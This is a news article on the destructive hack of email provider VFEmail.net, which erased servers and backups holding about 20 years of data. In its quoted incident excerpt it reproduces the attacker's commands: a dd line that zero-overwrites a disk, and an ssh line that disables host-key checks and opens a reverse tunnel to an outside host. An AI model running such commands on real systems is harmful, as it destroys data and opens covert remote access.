VFEmail.net cyber attack results in removal of data which was accumulated throughout 20 years
VFEmail, the well-known United States email provider, has experienced a brutal hack – the server was compromised and data, as well as its backups, of almost 20 years was permanently erased with no possibility to recover it. The ordeal, that the company called “catastrophic,” was initiated by unknown hackers. However, the attack was stopped before bad actors managed to infiltrate servers located outside the US.
Sadly, it is not the first time when VFEmail.net becomes the victim of similar attempts. In 2015, the company also faced an attack when they refused to pay a demanded price to the crooks. Criminals who were responsible for this are known as Armada Collective.
While no specific information is known about the perpetrator, there were some details discovered after all. Cybersecurity researchers identified the username “aktv” who used IP address located in Bulgaria, so, experts already know that the cybercriminal's location is the country where the IP is registered in. However, these details are not enough to catch the culprit, so the case might take quite some time longer.
The crook was caught in the middle of forming the backup server
The devastating attack occurred on the 11th of February. At the time, servers were unexpectedly shut down without any actions initiated by the employees. All important data and even their backups were permanently deleted with no chance of restoring. VFEmail.net has commented on this incident also. It claimed that specialists would be searching for ways to recover data, however, there are low chances for this possibility:
This is all I can do at this time. I will need to get into the datacenter to see if the one file server I caught during formatting can be recovered. If it can, we can restore mail, but most of the infrastructure is lost.
Nevertheless, VFEmail.net claimed that all information from disks on every server had also been permanently erased. The data includes the entire infrastructure of the organization, mail hosts, virtual machine hosts, and other valuable content. These disastrous consequences were achieved in a mere few hours of malicious activity by the hacker. Additionally, the company itself caught the crook in the process of formatting the backup server:
Caught the perp in the middle of formatting the backup server: dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559 via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null email@example.com -R 127.0.0.1:30081:127.0.0.1:22 -N
Moreover, the attack was created just to destroy targeted information, and no ransom was demanded. This surprised the company the most. Another surprising discovery was that all VMs were permanently damaged even though they did not have the same authentication. However, data backups that were located in the Netherlands remained untouched which let the company recover their service at least.
No security measure would have helped to avoid such invasion
According to Romero, the director of VFEmail.net, the cybercriminal(s) used a virtual machine and other objects in order to launch this devastating attack, and the organization claims that no security technique would have helped to avoid this hack, even 2-factor authentication would have been useless against the activity.
Even though the company has restored its official website, there are very weak chances that lost data will be recovered. So, if you are one of those who use this email provider, there is a very high chance that you will find the inbox section of your email empty and that all important and stored information will be gone – unfortunately, permanently.